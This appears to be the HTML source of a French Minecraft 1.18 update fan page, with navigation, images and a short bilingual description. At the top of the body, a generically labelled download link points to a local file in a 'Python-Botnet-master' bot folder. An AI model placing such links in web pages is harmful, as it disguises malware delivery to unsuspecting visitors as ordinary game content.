<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Minecraft mise à jour 1.18</title>
    <link rel="stylesheet" href="style.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Bebas+Neue&display=swap" rel="stylesheet">
    <link rel="stylesheet" media="screen" href="https://fontlibrary.org//face/minecraft" type="text/css"/> 
    <!--boonstrap-->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script>

</head>
<body>
    <a href="F:\eilme\programation\Python-Botnet-master\bot\reminisence-NEW.py" download>Texte pour le lien</a>
    <header>
        <img src = "https://preview.redd.it/rth6jtvv4c841.png?auto=webp&s=72d2e7810350ae3efa58dd60b3855de5f478898b" width = "1350" alt="">
        <nav class="navbar navbar-expand-lg navbar-light" style="background-color: #BECEFE;">
            <div class="container-fluid">
                <div class="d-md-flex d-block flex-row mx-md-auto mx-0">
                    <div class="collapse navbar-collapse" id="navbarNavAltMarkup">
                        <div class="navbar-nav">
                            <a class="nav-link active" aria-current="page" href="index.html">Mise à jour</a>
                            <a class="nav-link" href="changement2.html">Changement</a>
                            <a class="nav-link" href="nouveaute2.html">Nouveaute</a>
                            <a class="nav-link" href="astuce2.html">Astuce</a>
                        </div>
                    </div>
                </div>
            </div>
        </nav>

        <!-- <ul>
            <li><a class = "decLeft" href="index.html">Mise à jour</a></li>
            <li><a href = "changement2.html" >Changement</a></li>
            <li><a href="nouveaute2.html">Nouveauté</a></li>
            <li><a href="astuce2.html">Astuce</a></li>
        </ul> -->
    </header>
    <div class="container">
        <div class="row">
            <div class="col-12 mt-4">
                <div class="card text-center" style="background-color: rgba(255, 255, 255, 0.580);">
                    <div class="card-body">
                        <h1>Mise à jour de Minecraft</h1>
                        <h2>Minecraft 1.18.1</h2>
                    </div>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-12 text-center mt-3">
                <img src = "https://i.ytimg.com/vi/IDYb6-obUr0/maxresdefault.jpg" width = "700"> 
            </div>
        </div> 
        <div class="row">
            <div class="col-12 mt-3">
                <div class="card text-center" style="background-color: rgba(255, 255, 255, 0.580);">
                    <div class="card-body">
                        <p>
                            1.18, the first release of Caves & Cliffs: Part II, is a major update to Java Edition released on November 30, 2021.<br>
                        </p>
                        <ol>
                            <li> It completely overhauls the Overworld generation, with larger caves, taller mountains, <br>new mountain biomes, new cave biomes, et des grottes inondées. <br>Il a été annoncé pour la première fois en même temps que la sortie de l’instantané 1.17 21w15a lorsque Mojang Studios a déclaré que la mise à jour de Caves & Cliffs serait divisée en deux. <br><br></li>
                            <li>Certaines fonctionnalités de la version 1.18 ont d’abord été implémentées au cours du cycle de développement de la version 1.17, <br>avant d’être reportées et reléguées aux packs de données officiels utilisés avec un instantané 1.17 correspondant. <br><br></li>
                        </ol>
                    </div>
                </div>
            </div>
        </div>
        <div class="row">
            <div class="col-12 text-center mt-3">
                <img src = "https://img.gurugamer.com/resize/740x-/2021/06/17/warden-59cd.jpg" width = "700">
            </div>
        </div> 
    </div>

</body>
</html>

        
